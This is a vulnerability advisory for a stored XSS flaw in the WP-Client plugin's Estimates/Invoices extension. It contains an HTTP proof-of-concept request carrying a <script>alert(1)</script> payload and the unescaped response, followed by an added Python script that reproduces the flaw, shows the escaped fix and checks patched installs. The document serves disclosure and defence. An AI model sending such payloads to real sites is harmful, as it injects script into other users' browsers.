#####################################################################################
Application: WP-Client
Version: 3.8.7
Author: Pier-Luc Maltais from COSIG
Twitter: @COSIG_
#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============

One plugin configures multiple areas of your WordPress installation and allows the site Administrator to easily create new Client Areas, Client Management Portals, Client Estimates & Invoices, Client File Upload Areas, or Private Staff Pages on the site by entering just a few data fields. Additionally, clients can upload/download secure files.
(https://wp-client.com/)

============================
2) Report Timeline
============================

12/11/2015 - Found the vulnerability
12/11/2015 - Ticket opened
20/11/2015 - Plugin extension Estimates/Invoices updated (v1.5.2)
24/11/2015 - Public disclosure

============================
3) Technical details
============================

WP-Client is vulnerable to a stored XSS attack in the Request Estimate page: the message submitted with an estimate request is stored and later written into the request notes table without HTML encoding. The extension affected is Estimates/Invoices v1.5.1.

============================
4) POC
============================

Request :

POST /portal/request-estimate/ HTTP/1.1
[...]
wpc_data%5Baction%5D=request&wpc_data%5Btitle%5D=Request+Estimate+from+2015-11-12&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bname%5D=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bdescription%5D=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bquantity%5D=1&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bprice%5D=&wpc_data%5Bwpc_inv_message%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Response :

[...]
<div class="wpc_clear"></div>
<span>Comments:</span><br>
<table id="wpc_inv_table_request_notes" style="width: 100%;">
<tr bgcolor="E0E0E0">
<td><b>client:</b></td>
<td><script>alert(1)</script>
[...]
#####################################################################################
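Added example (not part of the advisory, and not the plugin's own code): a small Python script that decodes the POC request body above, reproduces the defect visible in the response (the stored comment written into the notes table verbatim), shows the same row with output encoding applied, and provides a check that a tester can run against a patched install to confirm the submitted value no longer comes back unescaped. html.escape stands in for the encoding step; in the plugin's PHP the equivalent would be WordPress's esc_html(). The field names and payload are copied from the POC; the row markup is a constructed approximation of the response fragment.

```python
import html
from urllib.parse import parse_qs

# Constructed copy of the POST body from the advisory's POC (same fields, same payload).
POC_BODY = (
    "wpc_data%5Baction%5D=request"
    "&wpc_data%5Btitle%5D=Request+Estimate+from+2015-11-12"
    "&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bname%5D="
    "&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bdescription%5D="
    "&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bquantity%5D=1"
    "&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bprice%5D="
    "&wpc_data%5Bwpc_inv_message%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
)

# Decoded name of the field that ends up in the request notes table.
MESSAGE_FIELD = "wpc_data[wpc_inv_message]"


def parse_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {field name: first value}.
    Blank values (e.g. the empty item name) are kept so every submitted field is visible."""
    return {name: values[0]
            for name, values in parse_qs(body, keep_blank_values=True).items()}


def render_note_row_vulnerable(author: str, message: str) -> str:
    """Reproduces the flaw shown in the advisory's response: the stored comment is
    interpolated into the notes table as-is, so markup in it becomes part of the page."""
    return f'<tr bgcolor="E0E0E0"><td><b>{author}:</b></td><td>{message}</td></tr>'


def render_note_row_fixed(author: str, message: str) -> str:
    """Same row with output encoding: html.escape turns <, >, &, " and ' into entities,
    so the browser renders the comment as text instead of parsing it as HTML."""
    return (f'<tr bgcolor="E0E0E0"><td><b>{html.escape(author)}:</b></td>'
            f'<td>{html.escape(message)}</td></tr>')


def reflected_unescaped(submitted: str, response_html: str) -> bool:
    """Fix-verification check: True when a submitted value that contains HTML-significant
    characters appears in the response exactly as it was sent."""
    return html.escape(submitted) != submitted and submitted in response_html


if __name__ == "__main__":
    fields = parse_form_body(POC_BODY)
    message = fields[MESSAGE_FIELD]
    vulnerable = render_note_row_vulnerable("client", message)
    fixed = render_note_row_fixed("client", message)
    print("submitted message:", message)
    print("vulnerable row:   ", vulnerable)
    print("fixed row:        ", fixed)
    print("unescaped in vulnerable output:", reflected_unescaped(message, vulnerable))
    print("unescaped in fixed output:     ", reflected_unescaped(message, fixed))
```

To use the check against a real response, replace the constructed row with the HTML returned by the Request Estimate page after submitting a marker value of your own; a patched Estimates/Invoices extension should make reflected_unescaped() return False.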